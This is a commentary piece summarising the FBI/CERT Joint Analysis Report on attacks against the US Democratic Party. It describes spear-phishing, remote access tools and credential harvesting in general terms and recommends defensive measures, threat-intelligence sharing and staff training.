On December 29th, the FBI together with CERT finally released a Joint Analysis Report on the cyber-attacks on the US Democratic Party during the US presidential election. Every organization, whether they are based in the US or not, would do well to read this report and to ensure that their organization takes account of its recommendations. Once released into the wild – the tools and techniques and processes (TTPs) used by state actors are quickly taken up and become widely used by other adversaries.
This report is not a formal indictment of a crime as was the case with the alleged hacking of US companies by the Chinese filed in 2014. It is however important cyber threat intelligence.
Threat intelligence is a vital part of cyber-defence and cyber-incident response, providing information about the threats, TTPs, and devices that cyber-adversaries employ; the systems and information that they target; and other threat-related information that provides greater situational awareness. This intelligence needs to be timely, relevant, accurate, specific and actionable. This report provides such intelligence.
The approaches described in the report are not new. They involve several phases and some have been observed using targeted spear-phishing campaigns leveraging web links to a malicious website that installs code. Once executed, the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques. The malware connects back to the attackers who then use the RAT tools to escalate privileges, search active directory accounts, and exfiltrate email through encrypted connections.
Another attack process uses internet domains with names that closely resemble those of targeted organizations and trick potential victims into entering legitimate credentials. A fake webmail site that collects user credentials when they log in is a favourite. This time, a spear-phishing email tricked recipients into changing their passwords through a fake webmail domain. Using the harvested credentials, the attacker was able to gain access and steal content.
Sharing Threat Intelligence is a vital part of cyber defence and OASIS recently made available three foundational specifications for the sharing of threat intelligence. These are described in Executive View: Emerging Threat Intelligence Standards - 72528. Indicators of Compromise (IOCs) associated with the cyber-actors are provided using these standards (STIX) as files accompanying the report.
There are several well-known areas of vulnerability that are consistently used by cyber-attackers. These are easy to fix but are, unfortunately, still commonly found in many organizations’ IT systems. Organizations should take immediate steps to detect and remove these from their IT systems:
- SQL Injection - Input from a user field is not checked for escape characters before inclusion into an SQL Select
- Cross Site Scripting - Software fails to neutralize user input before it is placed in output that is used as a web page.
- Excessive or unnecessary administrative privileges – that enable the adversaries to extend their control across multiple systems and applications.
- Unpatched sever vulnerabilities - may allow an adversary access to critical information including any websites or databases hosted on the server.
The majority of these attacks exploit human weaknesses in the first stage. While technical measures can and should be improved, it is also imperative to provide employees, associates and partners training on how to recognize and respond to these threats.
The report describes a set of recommended mitigations and best practices. Organizations should consider these recommendations and takes steps to implement them without delay. KuppingerCole provides extensive research on securing IT systems and on privilege management in particular.